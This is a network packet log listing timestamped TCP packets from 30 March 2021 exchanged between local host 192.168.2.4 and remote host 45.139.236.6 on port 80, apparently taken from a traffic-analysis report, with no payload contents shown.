Mar 30, 2021 14:22:52.661139965 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661142111 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661170006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661191940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661201954 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661216974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661242962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661266088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661278009 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661289930 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661313057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661348104 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661359072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661381006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661431074 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661448956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661472082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661492109 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661499023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661525011 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661545992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661570072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661592960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661612034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661617994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661643028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661667109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661691904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661806107 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661911964 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.671037912 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.673259974 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.744682074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744725943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744739056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744751930 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744769096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744786024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744802952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744822025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744839907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744856119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744873047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744888067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744905949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744923115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744940042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744960070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744978905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.744997025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745007992 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745012999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745032072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745034933 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745069981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745089054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745105028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745115042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745126009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745143890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745161057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745171070 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745177031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745193958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745208979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745227098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745243073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745249987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745264053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745280981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745299101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745307922 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745316029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745332956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745347977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745364904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745373011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745395899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745419979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745426893 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745441914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745460033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745476961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745491028 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745491982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745511055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745527029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745543003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745553017 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745558977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745579958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745596886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745613098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745629072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745629072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745646000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745663881 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745680094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745699883 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745709896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745723963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745740891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745748997 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745758057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745775938 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745791912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745811939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745826006 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745829105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745846033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745862007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745877981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745893002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745901108 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.745909929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745927095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.745953083 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.748219967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.750689030 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.751605034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751632929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751660109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751676083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751693964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751702070 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.751710892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751727104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751744032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751761913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751765966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.751784086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751802921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751818895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751837015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751852036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751868963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751879930 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.751888037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751904964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751925945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751939058 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.751945019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751962900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751980066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.751985073 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.751997948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752015114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752032042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752041101 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752051115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752069950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752089024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752091885 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752108097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752125025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752142906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752156973 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752160072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752177954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752194881 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752216101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752216101 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752237082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752254963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752271891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752273083 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752290964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752310038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752327919 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752341032 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752343893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752365112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752382994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752399921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752408028 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752418995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752435923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752453089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752464056 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752470016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752485991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752506018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752516985 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752523899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752541065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752557993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752567053 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752576113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752593040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752609015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752620935 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752628088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752648115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752665997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752669096 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752684116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752700090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752716064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752728939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752732992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752749920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752764940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752784967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752800941 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752804041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752820969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752836943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752854109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752856016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752868891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752886057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752902031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752916098 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752922058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752940893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752957106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752974987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.752978086 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.752993107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753007889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753024101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753041983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753043890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753065109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753082991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753099918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753113985 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753118038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753135920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753150940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753165960 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753166914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753185034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753204107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753216028 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753221989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753238916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753254890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753268003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753272057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753288984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753304958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753319979 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753320932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753341913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753360987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753376007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753396988 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753410101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753428936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753446102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753457069 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753465891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753484011 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753499031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753514051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753523111 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753531933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753547907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753563881 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753580093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753597975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753598928 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753617048 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753633976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753649950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753665924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753681898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.753681898 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.753760099 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.754616022 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835155010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835189104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835205078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835222006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835238934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835254908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835277081 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835294962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835310936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835328102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835342884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835360050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835375071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835388899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835406065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835422993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835439920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835458040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835469961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835474968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835496902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835515976 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835519075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835536003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835552931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835568905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835586071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835602999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835603952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835618973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835642099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835656881 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835659981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835678101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835694075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835706949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835711002 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835719109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835732937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835747004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835761070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835783958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835802078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835817099 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835819006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835836887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835853100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835871935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835887909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835896969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835905075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835926056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835943937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835959911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835967064 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.835978031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.835994959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836011887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836021900 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.836030006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836046934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836067915 CEST	80	49744	45.139.236.6	192.168.2.4
